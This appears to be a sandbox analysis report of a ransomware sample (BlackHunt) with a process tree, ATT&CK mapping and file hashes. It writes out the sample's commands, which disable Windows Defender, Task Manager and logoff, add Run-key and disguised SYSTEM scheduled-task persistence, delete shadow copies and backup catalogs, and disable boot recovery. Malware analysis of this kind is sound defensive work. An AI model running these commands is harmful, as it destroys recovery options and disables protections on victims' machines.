C:\Users\Admin\AppData\Local\Temp\8704e439806fe93dbd485e1f114a7048e068b2e655c68806731e9b95e23c9048.exe"C:\Users\Admin\AppData\Local\Temp\8704e439806fe93dbd485e1f114a7048e068b2e655c68806731e9b95e23c9048.exe"1⤵
- UAC bypass
- Checks whether UAC is enabled
- Enumerates connected drives
- Drops file in Program Files directory
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
- System policy modification
PID:1720 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2" /f2⤵PID:2460
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2" /f3⤵
- Modifies registry class
PID:548
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f2⤵PID:2264
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f3⤵
- Modifies registry class
PID:2572
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2" /f2⤵
- Suspicious use of WriteProcessMemory
PID:2888 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2" /f3⤵
- Modifies registry class
PID:3052
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f2⤵PID:2488
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f3⤵PID:2904
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run" /v "{2C5F9FCC-F266-43F6-BFD7-838DAE269E11}" /t REG_SZ /d "C:\ProgramData\#BlackHunt_ReadMe.hta" /f2⤵PID:2840
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run" /v "{2C5F9FCC-F266-43F6-BFD7-838DAE269E11}" /t REG_SZ /d "C:\ProgramData\#BlackHunt_ReadMe.hta" /f3⤵
- Adds Run key to start application
PID:2132
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f2⤵PID:2588
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f3⤵PID:616
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /f2⤵PID:2704
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /f3⤵
- Modifies Windows Defender Real-time Protection settings
PID:608
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Spynet" /v "SubmitSamplesConsent" /t REG_DWORD /d 2 /f2⤵PID:2468
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Spynet" /v "SubmitSamplesConsent" /t REG_DWORD /d 2 /f3⤵PID:1076
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats" /v "Threats_ThreatSeverityDefaultAction" /t REG_DWORD /d 1 /f2⤵PID:2496
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats" /v "Threats_ThreatSeverityDefaultAction" /t REG_DWORD /d 1 /f3⤵PID:2544
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Low" /t REG_DWORD /d 6 /f2⤵PID:2572
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Low" /t REG_DWORD /d 6 /f3⤵PID:2744
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Medium" /t REG_DWORD /d 6 /f2⤵PID:2504
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Medium" /t REG_DWORD /d 6 /f3⤵PID:2968
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "High" /t REG_DWORD /d 6 /f2⤵PID:3020
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "High" /t REG_DWORD /d 6 /f3⤵PID:2624
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Severe" /t REG_DWORD /d 6 /f2⤵PID:2132
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Severe" /t REG_DWORD /d 6 /f3⤵PID:1820
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\UX Configuration" /v "Notification_Suppress" /t REG_DWORD /d 1 /f2⤵PID:1600
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\UX Configuration" /v "Notification_Suppress" /t REG_DWORD /d 1 /f3⤵PID:2908
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoClose" /t REG_DWORD /d 1 /f2⤵PID:268
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoClose" /t REG_DWORD /d 1 /f3⤵PID:2964
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "StartMenuLogOff" /t REG_DWORD /d 1 /f2⤵PID:340
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "StartMenuLogOff" /t REG_DWORD /d 1 /f3⤵PID:2472
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableChangePassword" /t REG_DWORD /d 1 /f2⤵PID:1452
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableChangePassword" /t REG_DWORD /d 1 /f3⤵PID:2140
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f2⤵PID:280
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f3⤵PID:2832
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "NoLogoff" /t REG_DWORD /d 1 /f2⤵PID:1444
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "NoLogoff" /t REG_DWORD /d 1 /f3⤵PID:2380
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f2⤵PID:1516
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f3⤵PID:1032
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableConfig" /t REG_DWORD /d 1 /f2⤵PID:1280
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableConfig" /t REG_DWORD /d 1 /f3⤵PID:1932
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableSR" /t REG_DWORD /d 1 /f2⤵PID:2772
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableSR" /t REG_DWORD /d 1 /f3⤵PID:2668
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\WinRE" /v "DisableSetup" /t REG_DWORD /d 1 /f2⤵PID:2120
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\WinRE" /v "DisableSetup" /t REG_DWORD /d 1 /f3⤵PID:1784
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupLauncher" /t REG_DWORD /d 1 /f2⤵PID:1776
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupLauncher" /t REG_DWORD /d 1 /f3⤵PID:2100
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableRestoreUI" /t REG_DWORD /d 1 /f2⤵PID:1860
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableRestoreUI" /t REG_DWORD /d 1 /f3⤵PID:972
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableSystemBackupUI" /t REG_DWORD /d 1 /f2⤵PID:2036
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableSystemBackupUI" /t REG_DWORD /d 1 /f3⤵PID:1456
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupUI" /t REG_DWORD /d 1 /f2⤵PID:1620
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupUI" /t REG_DWORD /d 1 /f3⤵PID:1032
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 1 /f2⤵PID:1580
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 1 /f3⤵PID:2460
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 1 /f2⤵PID:2512
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 1 /f3⤵PID:2116
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c SCHTASKS.exe /Create /RU "NT AUTHORITY\SYSTEM" /sc onstart /TN "Windows Critical Update" /TR "C:\Users\Admin\AppData\Local\Temp\8704e439806fe93dbd485e1f114a7048e068b2e655c68806731e9b95e23c9048.exe" /F2⤵PID:2788
-
C:\Windows\system32\schtasks.exeSCHTASKS.exe /Create /RU "NT AUTHORITY\SYSTEM" /sc onstart /TN "Windows Critical Update" /TR "C:\Users\Admin\AppData\Local\Temp\8704e439806fe93dbd485e1f114a7048e068b2e655c68806731e9b95e23c9048.exe" /F3⤵
- Creates scheduled task(s)
PID:1820
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=401MB2⤵PID:3012
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=401MB3⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:1932
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=unbounded2⤵PID:1396
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=unbounded3⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:932
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=401MB2⤵PID:3000
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=401MB3⤵
- Interacts with shadow copies
PID:2052
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=unbounded2⤵PID:1060
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=unbounded3⤵
- Interacts with shadow copies
PID:2876
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin.exe Delete Shadows /all /quiet2⤵PID:1808
-
C:\Windows\system32\vssadmin.exevssadmin.exe Delete Shadows /all /quiet3⤵
- Interacts with shadow copies
PID:2984
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} recoveryenabled No2⤵PID:684
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} recoveryenabled No3⤵
- Modifies boot configuration data using bcdedit
PID:1784
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} bootstatuspolicy IgnoreAllFailures2⤵PID:1656
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} bootstatuspolicy IgnoreAllFailures3⤵
- Modifies boot configuration data using bcdedit
PID:3028
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil.exe usn deletejournal /D C:2⤵PID:1672
-
C:\Windows\system32\fsutil.exefsutil.exe usn deletejournal /D C:3⤵
- Deletes NTFS Change Journal
PID:1760
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wbadmin.exe delete catalog -quiet2⤵PID:1752
-
C:\Windows\system32\wbadmin.exewbadmin.exe delete catalog -quiet3⤵
- Deletes backup catalog
PID:2304
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable2⤵PID:936
-
C:\Windows\system32\schtasks.exeschtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable3⤵
- Modifies registry class
PID:2904
-
-
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken
PID:2300
-
C:\Windows\system32\wbengine.exe"C:\Windows\system32\wbengine.exe"1⤵
- Suspicious use of AdjustPrivilegeToken
PID:2284
-
C:\Windows\System32\vdsldr.exeC:\Windows\System32\vdsldr.exe -Embedding1⤵PID:2464
-
C:\Windows\System32\vds.exeC:\Windows\System32\vds.exe1⤵PID:2456
Network
MITRE ATT&CK Enterprise v15
Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
1Windows Service
1Scheduled Task/Job
1Privilege Escalation
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
1Windows Service
1Scheduled Task/Job
1Defense Evasion
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Impair Defenses
2Disable or Modify Tools
2Indicator Removal
3File Deletion
3Modify Registry
4Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1KB
MD556143575918b2757919b4b92c035b13c
SHA17a019b7ef4cd2d32ebad1684f9c1f4fb7cdacee5
SHA256c934f005916af1a8751051a48cca14199c05576f1db939e86176b67e41140cd2
SHA51274b2b70509417b88099d74d12c99939e54256ffdba2491dbc1b4dbe8f3c1a5219574546750410574b99cb9d57d0abdcb7bb2ad2a7d06df7a6fe8617068f58dd4
-
Filesize
12KB
MD54b0e3e59bdef6d954e7e6c514491d9e1
SHA103a404e18fbfd08e0a8ad948e12dba4946202316
SHA2563bb79dac8511d3909299e74a39839cba926ab86bf4e63372e679377b215ea185
SHA512137af271a5c0c44c1af8fccff8e2808abc794cc35d13c31cd86cf9c6fee388bbe3ca54baa462271dd97ca892172cddc3139273cbc7d2b911d555c6c4a10a051d
-
Filesize
684B
MD5870cc8ca7abfdb374259e5ad067e2b68
SHA1ee80677467ea547cbfbfdfad464f7c9a3d06dd37
SHA256ff0e46431eebf95839d1846f5f582bb9691ee4984ce0c8d94e6adad6740ada67
SHA512ba36166b27b708b047c9dfeb14675e53cec968773d7bc3f1e7a5d7f72f0896a325ac230d00f1510c917b7b9ce4e2202bff17d0307f5c3a28f63c8d6c27e9b267